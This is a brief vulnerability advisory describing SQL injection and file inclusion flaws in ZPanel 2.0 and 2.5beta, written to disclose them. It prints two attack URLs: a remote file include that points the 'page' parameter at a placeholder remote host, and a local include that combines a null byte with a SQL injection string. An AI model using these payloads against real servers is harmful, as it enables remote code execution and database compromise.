ZPanel Multiple SQL Injection and File Include Vulnerabilities

ZPanel Multiple SQL Injection and File Include Vulnerabilities

No exploit is required.

The following proof of concept demonstrates a remote file include for ZPanel 2.0:
http://www.example.com/zpanel/zpanel.php?page=http://[remote]/[script]

The following proof of concept demonstrates a local file include for ZPanel 2.5beta:
http://www.example.com/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1

The following exploit code was provided by 1dt.w0lf:

/data/vulnerabilities/exploits/zpanel-sql-exp.pl